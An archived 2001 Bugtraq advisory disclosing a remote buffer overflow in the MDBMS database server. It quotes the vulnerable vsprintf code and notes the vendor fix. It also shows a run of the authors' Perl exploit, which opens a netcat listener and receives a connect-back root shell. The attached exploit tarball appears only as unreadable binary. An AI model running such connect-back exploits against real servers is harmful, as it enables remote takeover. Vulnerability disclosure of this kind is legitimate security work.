6618752 2001-06-12 21:47 +0200 /90 rader/ teleh0r - <teleh0r@digit-labs.org>
Sänt av: joel@lysator.liu.se
Importerad: 2001-06-14 00:08 av Brevbäraren
Extern mottagare: BUGTRAQ@securityfocus.com
Mottagare: Bugtraq (import) <17414>
Ärende: Remote buffer overflow in MDBMS.
------------------------------------------------------------
Dear bugtraq readers,
MDBMS is a SQL database server (currently) for UNIX systems.
Version 0.99b9 and below versions contain an exploitable
buffer overflow in the handling of the \s console command.
When a user passes large buffers to the server in the form
of multiple lines, these are appended to the end of each
other. A subsequent call to the \s command causes the
overflow.
Below is faulty code (from interface.cc):
void user::uprintf(char *s, ...)
{
char b[10000];
int len=strlen(outbuf), newlen;
va_list ap;
va_start(ap,s);
vsprintf(b,s,ap); <----
va_end(ap);
newlen=strlen(b);
while (newlen+len+10>=outsize) outbuf=(char*)realloc(outbuf,outsize+=1000);
strcat(outbuf,b);
FD_SET(fd,&parent->wmask);
}
mu-b also found a buffer overflow in the "create database"
system. This was actually caused by a sprintf that generated
the name of the management variable. This has been fixed -
now table and database names can no longer be larger than
128 bytes.
Information about the overflows was sent to marty@hinttech.com.
He has now fixed the problems, and new versions of MDBMS can
be found at: http://www.hinttech.com/mdbms/
We would like to thank Marty for kind response and quick update.
Exploit example:
----------------
[teleh0r@localhost mdbms]$ ./mdbms-pms.pl
-- Remote code execution exploit - MDBMS <= 0.99b
-- <teleh0r@digit-labs.org> - Copyright (c) 2001
Usage: ./mdbms-pms.pl -t <hostname> -b <back>
-t <hostname> : hostname to test
-b <back> : connect back to ip
-p <port> : port (default: 2223)
-d <delay> : delay before timeout
-o <offset> : offset
-h : return to heap
[teleh0r@localhost mdbms]$ nc -l -v -p 1337 &
[1] 2070
listening on [any] 1337 ...
[teleh0r@localhost mdbms]$ ./mdbms-pms.pl -t 127.1 -b localhost -h
-- Remote code execution exploit - MDBMS <= 0.99b
-- <teleh0r@digit-labs.org> - Copyright (c) 2001
-> Connected to: 127.1 / MDBMS V0.99b9 ready.
-> Address : 0x302027d / xor-mask: 0x2020202
-> Return : 0x80cfe76 / using the heap ...
-> Sending payload: ...
-> * Successfully sent payload - good luck!
connect to [127.0.0.1] from localhost.localdomain [127.0.0.1] 1189
[teleh0r@localhost mdbms]$ %
nc -l -v -p 1337
whoami; uname -mnrsp
root
Linux localhost.localdomain 2.4.2-2 i686 unknown
...
Exploit code attached.
Sincerely yours,
teleh0r and mu-b
--
To avoid criticism, do nothing, say nothing, be nothing.
-- Elbert Hubbard
(6618752) /teleh0r - <teleh0r@digit-labs.org>/------
Bilaga (application/x-gzip) i text 6618753
6618753 2001-06-12 21:47 +0200 /41 rader/ teleh0r - <teleh0r@digit-labs.org>
Bilagans filnamn: "mdbms.tar.gz"
Importerad: 2001-06-14 00:08 av Brevbäraren
Extern mottagare: BUGTRAQ@securityfocus.com
Mottagare: Bugtraq (import) <17415>
Bilaga (text/plain) till text 6618752
Ärende: Bilaga (mdbms.tar.gz) till: Remote buffer overflow in MDBMS.
------------------------------------------------------------
���·o&;��ì;iwÛÆ®ýjþâÄ£
¤6[^nÒ$msn¶�»}½×vu¸$Ö�Ép±¥&¹¿ý��.ò�÷µÍ}KãH��Ì��0 ´ðEÚæË8ü¬ûÍ_r�Fß�
�ðI×ú§ø>êf¿?��ûß�¦Õ�¾a¿f:õ+O3;aì$²Ûð>÷ü鵨é_ÜÅ´��Þ�iÜ¢Ó�óú�ú£!à÷fÿ�füyS¸ùú®ÿû÷ºyt�?ìÆ< 4í>ûÈÞñEqö4ò8{¾änùQÈü½zöí«#vÄ�°ý�ftvw�"y�Å«ÄÍ3¦»MfZ³bû��øÜH�{þÌÏÚí¤(��É `D²§ÈÓë0|BO¿Ígl�å¡�|ÆLòi±Ë¹�pv�%ç~8cY4ãÙ�æB$~6g¼ít
.O�îùY:fS?§ÿþ7�Ë��óÄ)s �Æ\�»°Üv` 9�bøÍíÍü��²�ï°c8<.�E
XÂòS¶°á�^�Øfî»ç,Ê3Bït�n�.Û®c»çí
w\F�åË
k'�g¶�¤�MËSÎ"÷g{,M�a@ßó,³ñø(óöØnR}+�;ãxì£ñ|«ÅN�Øɬ¹§iþé�ú!÷ôM}Øʶ>5ì�Û�Ôì�pöé�|GáãÄ�+ð�ðc
�GIVÁoÀ÷�¾Ç�{Uâ{7àG
?NÓÊü£�ðç
Îí¸29á�Á½D
åáC±Þ&>ÌS{Æ'h�{@³i���¶öØÃ8ñÃ�%$
ðû'
-èøíñ4:é*�y2[uB5ÏÀ3;`/�1~a§¸Ûöö8âßØÁ}fZ�¾¦`vÆb�Ê%XPiþm2·ù�·5½qºì��~ôÄ)>,úØÝ�w;Æð#î%ئÞTàîÐ5j í�=oÕbhMXóCÜ���N�´§Ñ��i�²Ò·-
��mí�ñ}ÖÝf;»°q2Øå�´Ý�ó,ÇÝîååeMÝ!n�4
ÚfÉå@Ã�§KÏ9]�z(úgÏlt�Ç5N�ü
(ÓåÎîé�ëÁwCà8ÓÍ�8íO�GÓÑæ�\ Ü�F��©;§Kc�wÅ(�Ãvv����'¸7
��ÀýÀP#Ê�nô�Ì��33¦ �oW|N�
+ù�¨Î�·�8#Ä�-�ÎÀ�s�rP6àzò~�ï��Â'Çá=AW[)Æ3Bj ÞÍ_�°;@ùSÃ�À�ðÍ_�±P�!��Ãl0Ø÷ÄÞ�gy�Ò�¥Ýú7f,�ÃòÑáÆN§6÷�2"ðãàã(M}ôÞYÄ$=|C¿N,ü0Í`o²hJ0 ����Ä·(-ÈÎ*¶Ó�|m�ÉÁ3ú3°2Ø_�F!äK��)B�ÚØÎÜy½ ñÃ(c6�µÀ'� ¢[Z4° G�¢iÜ=íoàp9_±b9È�¼��Î1��(ÈKÈ5Èü
ãÞ ðeÖqÝ1Ø)]o²3PÂoÿäﶬ-pÇ�?�0˲z��þ��=CF
7ýå7ÒLùÂðäè�5`Ç<O2Á!Àé�li|®R¶~ôæéß�·ÐânmÁx�CBØÁ¿XÚ½ßíÎöØæG ñ
B¾éGÇÏÞüx>�ñɵêö!$�41�BÆEèêJ§aC@�S"yâyh¤`6�î�KÖeË(¡¸+�@ÓZwh ý·��Ð(�h�1ÞI{-ÆÈSRy¡ïN§C�IË�|b<@~g^dÈ7°ZÔ��=¤íU�ÙÞ54�6qlðÞM2¨C
4]�°eìöÖ4r�ÂHÛì(w]�ñ4Ç�+åa¦F
�5"�¹{~Oh�&æ�«�\��,�Ë`�bÏ&v�
z"q�ÿñ#ZÞx$Q�fp¯T<fRú¦/ >÷5�â·GHiBØMpGM0ò�áÍ�Õ6JF¿�#�È�F}ül6DÄ;��ú²¿Ïvì�ðØ�ä$�±¤_�D<�
æêa��}"ªMRJh±*¨�ÁøñDê�¦Ëpû��&]Ói©ëà@�5�S$b:�å³ÃC\Ï](�_RÃæç)�¾¤°ú�&áPÒ�Ã,6��Sò©8 e?G/¾ÿ°õäå»WÓ�0DúP³�
�>Tú�ÜKMöIú%á
a>�ãLÀl�ÒÁɱ«É��Å¿ùË�Æß³-p¿ùr�SFp�_è
7àvÒ éWaí[¯.ý°g¡§�ym·µÕ)�(/Ni2�À~�5uJ[óà�ÚÅñìtý|�ÔW�t§amßn¢b��gÙ¼Y�N>òD9r_�r_JªÊÞ$¬�|0�>Á³Népó¬ææª2è¨l�bHÀy¬ÀW_}�
�ª�N
É
�ªQ_¥t{w^f-b(d�©Ùd�XÝ£µëRh&!ɸoUî±ê¯
°2ø¢Éo�V�·®Úÿ=!�×Ôùè౯*�ñúë:.}¼®�¾Gê4׬µkU¦�.T·¦õBãå�¨39=M×�¸ArPB5�b\Ϥ�&ùàè�L¶Ê¸%±K7¬®[ÂØf¬ø¤pðÇï��8áp-9Hón|��Oà�3 ïÎ*´�\ßÊÜx«y§ù�áQý¡�ßÛï&/^ã��Lß=òª%G»5>KqÉa\_Ë]�T� ¥¨òl�jZ;�cxÿ^ÿ�ÁÚ�ÛG¢4Àó9l�³C±Úµ§�³1uK<O3¨�ÕÇjê$ìÇ�5fû¨À
*åâºLóÇ7%²Çö)æ��È"89�ö�WL"G�ûbß�*dq+�Ï×ä:®�0§Ô4Üo|égR ÿîúä×믽êõ'eý¾
'è?±Øõÿa¿Óûþ`PÖÿ�#�ëÿ£Þ×úÿ�¹´g2©w¬L[&GÈBlvô�/gg6${p�µÝÍ�wÁªI�À¯_ü,SÖ´£ý$«�xîReCËeÙ"EÏÙ~�TÂ**%2'�q�TïÀò{
ªw�4
0ý],àiiÚÎ9p¤ú�Ãò
OY� ®iQx�k¼aú�¦�ã�x^?� ¤-|��¶ÁÅÚq����D¹%¤ê�·Ý¹�a�¶Ãà�#åïs<óº6�gË©Ò��ã¨è¤VØÑ´oI4 jòý+ÐëÓ$ZÀ�3@³]ÞqÝæXÓ."ߣõǹ,�¸sÐß6L·Óé45LK�⸷(�<ÌÍ�Ò,����¤Ùbôð�1.ìIàCV%7ºÃMévÜJ)Ê^¤r4§¶ì�R¤ý6\��)Áà¨�r�&ÞØèâÑ#ü3Ã�Dêÿ�Ù©Í�c»I/g"Wα%±��ª��¬];SÏÅ�ß=�=?Ö§^ëal£U¶�/åI�2�|!�g·4¯lv5\���TÊÖ�L��/|°(gÃnp³^�.ñÝ�ðÂ�Õ»��ybc]JC¦'H«�#c�ra'T�¬ñõÃÁz§þcD�a^bO å�Û�ÙAÁ¶ #�Dá�Öápaæ N dií::ØÖ�ÍÛ¦¡íà�'¢V.ÖDe�°Ö�¨|õx�Kɸ;ïÕ¦úA¼ûÂé¹!=$w0³E* ÙrcÃR
ëÀ9j�WB¦Rµ¯�"^:waûâ{½<ð`ÿÜ
sÎ^á´ÈÉûÀ)ái�� ¹¼Ï}Ȭò�äÃaµÏåÙ/í�lä±Ö^»4íD½�+³�Jåiü³MÖ©½þÖ´ß}ÄÖ*Gê;¨5Mf¡õ¡ÿe¤ì�f¤·¨,tY�Äuó7{½�{¨g Û¡¡CãTo�ØáêL ü�fÒ6QÇDiÈíù±+
n1®äü°�·W�Vã6=Ã2¬W+t�KË ZÀl,Õ;ëªÌÚuUdãï(új2>Ðì ®Ã -t
h;ôÍ��TÑLsg÷6½=ÐÖA»GöÂßc9íö"LÒXÃDN{e¹��µ:ýÕ¶?Ü��é9ø¾P£Õ*ÿBú¶³�â?÷�~ä.O8¬~�å>ë�Ó$'
�èì9ªÿ æ�wíÿ2FCc`PÿOÏ´¾ö}ë&ý¯7¦ü1n?ÿ¨n¥Ë�àùod�èëùï�\Ým¦�§×�*; ä@§øn´)�«üÙ2¸ I@,è %½.[-0í¬c"{òú��Ý^�I
;¨ì`�%²`/��ÃÇ]�\b"�H�Â�?¿y·%X"=�LáÀ��Å�f}ç��ß;a��§2ºÌð%»�e2Ilá»+pö)2K¢��P£)Ó DÓgV�Û¡âÊ+�¡¯��#0×î<|LC-9 æÿB>�Ad*�Ñ ½&®¸&��§8G�*�s âÓm$áBD�]#º
$�C� <Yð°/£Ì]>,T©Tõ\È=�a�EG/Ô×BUP?��&DïB��Âë-rT�PìÛÕ�}êªöô�jÔÌÓÝÖ:³�N�ÌuøÌ�;ÈJ ± ØXÛ¸¯ªÓVXËÇ×j�ôäÚBõ·oß½9~39~ú¶©m@�l<àβÅðm#ÎÓ¹ll�÷
¶¶�AãZ¬Ê�·`Éù�Ú4¨
èÂÙØ4ÁXØ�;@\øÎ�ØdòúÝD¬�+�Ú�l �Gÿ8z:qA¶ilÝ%Î$ÛØÄDOCA©ò;ò3�¬sÈÍÔK�¶ÿ·°nмÖèÁ¿þÈF�\Ä»
À¬l�ö°wÀ4�ry%DÐâPß/�©·k�h5ó�lR'÷³·.ÄË�ÎrmÈ¥Ü� NPøÕáÈ%Q]PK�
X¾yýúùÓR®B] �itS�ä/ØF¡UMl *¼<¶
=ôÚÆ�®Y#lÑ-×ëùÒ8,¢x|ãÃ^9�S�
A~¿éäA���*VP;0lJÝYá�й}y�Fàzï+b,D
|;£5�ò*hwhYSkº&Þ&u
Ý �Ó¼"5
·ýXCÇp�L#ÈÁ¯ì§çGùa��øÎ�lvÅ�ªÃÁÑ»~XÛIlwñ 5ªAn4©ÊIáÜNÎÀ�îÐkxVCÑixº�Ù§K£/ú�©�Ð�}{ÆPGh!¬·��J½ûp½óPêÍë
µ¢êë}Ro=\o;�s©u�®w��J½ñp½éPê}ë=b.Ôv¨Ý�ÝZìèÉgÏþ1yùæ)Ó�Þ¬?stÖ¼Btôâ¬_
¾zrô÷ϲ²zuVD$Xi¸�±§zòº�=*çQõ¦%K¸Ô £ZJt¦ã³�úy0ÎÉ^�¦^ðëuz;O
àZüõfÛñ¯¶ò(üfÑn Ë:¦xkÝ<ë�ª×RÛ
´<Zø¿ñR¢k¢Þ'
ܳ�Ö6uA6Ób��ÀXC®âb2t
.©*-¥^�Q´m!¸�&�'�£°G̽�ÈÑÝ+�¥;H¶§"?MsùÆò2�,x3ĤIwEÓ«zÖÜGdK�xAl5à 4;v±é÷
S�ý`~�õ�Ñ_¶à�r�5Ñ�κ¬|®.ÙǶÓj·¨¥ú�EèÁ}c'XbâØÔ¨zØhÙUJX½ÈB3µVu©Î8!aAê$Ü>/V�qj7¬yëÔØj¶6³�À�Èb�4��²m�æ©"iµ©A
gÀ)^åâhQ²O½X�¬E$ßµ|¼8®êMSönw�ZÐ�¯ôÒ`å;æC±uýHüÒh�|�µ*f[m ½¤ ³öCöB2s[j»$³3eè´çôíiSÇ��n·7�:ÙF#RF?¤�Q/JѨãhØëd)Ó½Q9¹(?H!Ú
�
¡ã�)�Zs�mój«+(��^¹8z��ù:êÆÕÈ�#5ñ²_&`µØCÙgs[²9ñæõ<��ÂYÎ÷Ê#§íÀy�¶Ì½ri&åyWÖT5²Â�®Sy
&'wÔu~æÞI'"¡¯ÂV5Ĭ�·V5h~WÌ[8/½f£ÿ»K�_¯[®µßæmçÏÿ�ðÿÛ�ôGôûÏe_ë¿_âºFÿ�Â×?Võ-¯ÏÔ¾9úïFF�ð�=kôµþû%.LÊJ}�5¹W�c�ôzñgõS½þÒ;p$h�ÈÇp�¤)
Çéý`glÔ1�[ÉÂ4d9²¼
LSò¹á�ÄhW~>,(ê-EézOÑÕn�U¼¶«Hv�ÝÔK´o'º©�©?ÓPÄni(R�/'Ú¢G¢§h.½AìCµ}è��_Î}�¡Tµ�DÕc¿O8Ç�L/~ÅÂ.�û�þóì´ãqQéã¨ë¥ËÚmö@/�D:¼÷xó(áþþJMàK�,�}@à é
£+Å�o�dIQpqKmçó¥ ,�e«§w«(�º¿à×`g¶('©úÀë7o7eß,�oß¼;ÞÀ�åÇW?ýøòõQ@Þ|÷ÝÑóc�#³øá�åî�hq¿�ÆÜ¿PÎV�A²¦ð�mʹ<hì©Æ3ÈÓ1Ã�e0<øö
Ã:�d(�üMBÊ¡{Zýð�cÈãA�'&ÚÙ�¦½°gÍ�8'Ó3¦òË
ù�Q¬�
°^´+ÊLX�ê�±Õ ¾¹½òá*xÒSÂCø�À<øÎÅ÷²ºUâÑ/f;Tã¿�¼/ñ^¾¨þgUæ¶Sâá�»râùPÍ£Ä3ûò9�ó¯Ï³Ä[¯Æ
$~jõq¯àJÙTå2k,½
Me½(_Uâ#]ìxÕùáó¾Y}V
Õå2¥9ÄüFj~£�oÚ²pijµ_��x\êv:-ÿÊbbE~µ_<7®X¨üU�ا¦~¤l5T]G\`·Ô�B/òÈßOy,[�!�Kæ#[ò±v]ú`ðSI�Â���ØyÂÉkûa�åÿÕÎõõ´
�ñçöSxLf¤¥�Ú
Tû�I�{k
Ðh× -L¤ÓP¿û||¶Ó8��h/÷{¨Äw±}öù|¾K+�B�´�"Ræ-<$#Ñ\H�»)'o¹ü½,~ÒAÝÖ~+ù¿U/ÚC×v»ë¡d
âOÝÎÙ�¬�\»ûl�@Ú
%r¿äf�H<Í!oi¸Íth¶�i:v^ìl¿çåÇÈô¨/9²C���i´7Ò$
F_�ÓdÉ%4ȱ«ip�8&á² O�¸�9��3ÁÐ Ù7ãÌ^;¯¡AU]�ì":¸ãÊÂ�7Ê9Ù1x<
�âÇðè`^�Ä4D�>9|2<àÊ
:!]|ð¯U�µUÖ¦ÆæòoÛÚÌ\C·N{�8>EÀiÄ]%T~¡º[8ÔÝá!þÝv_°SÜêüo�ÀM:X��«Ïê�x�üÃ<=&�°y#ô~A¦7!�¨�´¿B^µcëkk
?àt¿®2,�Ô`J¿]sæb±êõ*#á�Íylax�ºÿú#?6¬v°·Ç�²=ñTÆ>=��ì�ç¯fFí©ûUÏße¯$Ts½¤´=h�gíagdà_½ürqá�Å®âw�*vÓæf½ìÏÖÑNgÅ÷a5¼´Ó�çþ\3Ìiõ+ë¸ÖÙ'�º+Ñcµ�¬n~�ß!'EuÚP�Î9z�èL-��¹éõ`X�
²HÉÞq
ZCÙ£Ur0tèv×?ªü|g�{w×8r�¶ï��>34÷Óϼ¼"%1õ� ÅËjÄ©b1@k T�»Ì6û·�ûCv«§kÔY¢úøê��8H6�úy1¸íç�^�ºn�K$��TCl-È@À3w.aü¶dâJXO²n·57ûÎ�Æ�Ï
�ÎÜÞÌ�Ê�(;?ÞªÚû±º�Ì)��rA�©�ÏÊ�7´Ú¬ö¥bB�4�¦ó
ñÊÊ
(Ô?¯3&¹6qãrB·ûóò�Fü�ß[äËιr v®C¦DøÙ5|*�yÎ22=\ilï��SZrS¥1+±ø�úö
�J8çoÚ°É&õJÎBÈTÀhy[}JId�ý§�Âñ(øV;o40¾kf=aÖ¶`;Ã]Òc&��K{õá5drª
�HËG�O¢ðGjXÇÚ)�S~
�ÅÉÉ»cú¨�t�JMÆuæ¦;.ýßÎX
B¡P(�
B¡P(�
B¡P(�
B¡P(�
âø�_0óÁ�x��
(6618753) /teleh0r - <teleh0r@digit-labs.org>/(Ombruten)